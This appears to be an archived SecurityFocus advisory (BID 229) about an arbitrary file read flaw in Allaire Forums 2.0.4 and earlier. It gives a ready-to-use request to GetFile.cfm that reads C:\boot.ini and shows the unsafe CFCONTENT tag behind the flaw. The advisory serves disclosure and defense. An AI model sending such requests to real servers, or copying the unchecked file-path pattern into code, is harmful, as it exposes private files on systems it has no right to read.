7 lines
No EOL
456 B
Text
7 lines
No EOL
456 B
Text
source: https://www.securityfocus.com/bid/229/info
|
|
|
|
An Allaire Forums file "GetFile.cfm" in the root of the application directory allows anyone to access any file on the Forums server. This vulnerability affects Forums 2.0.4 and earlier.
|
|
|
|
Type the URL "GetFile.cfm?FT=Text&FST=Plain&FilePath=C:\boot.ini" (without the quotes") where C:\boot.ini is the pathname and file to read.
|
|
|
|
The syntax of the request is <CFCONTENT TYPE="#FT#/#FST#" FILE="#FilePath#"> |